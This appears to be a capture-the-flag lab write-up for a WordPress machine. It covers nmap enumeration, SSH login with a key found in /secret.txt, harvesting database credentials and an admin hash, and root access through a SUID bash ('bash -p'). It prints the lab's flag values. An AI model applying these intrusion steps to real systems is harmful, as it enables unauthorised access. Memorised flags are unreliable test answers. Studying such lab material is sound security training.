# Enumeration
## NMAP
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_  256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher &#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne
```

## Web
- robots.txt one entry.
`/secret.txt`
- `/secret.txt` contains lines of base64 encoded string.
- Apparently it is an openSSH key. But we have no user.
- Wordpress 5.4.2
- Found no plugins.
- User found only `admin`.
- Nothing was found after more more of enumeration

# Foothold
- Reading of the post.
`Oh yea! Almost forgot the only user on this box is “oscp”.`
- I tried to login with oscp with the SSH key and it worked!

# Privilege Escalation
- Need password for sudo privileges.
- local.txt
`685e600e251221956f460fb3191f7628`
- Found database credentials
```txt
/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Oscp12345!' );
```
- We only found the admin hash which could be helpful.
```txt
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$Bx9ohXoCVR5lkKtuQbuWuh2P36Pr1D0 |
+------------+------------------------------------+
```
- We are in LXD group which means we can escalate through containers.
- But somehow the `lxc` command does not exist.
- Run linpeas to find SUID or hidden files.
- Found an usual SUID bit.
```bash
-rwsr-sr-x 1 root root 1.2M Feb 25  2020 /usr/bin/bash
```
- If it's set as a SUID, we can run `/usr/bin/bash -p` to escalate our privilege to root.
- proof.txt
`f339b2e3fae126897ed3bc7351cc4223`
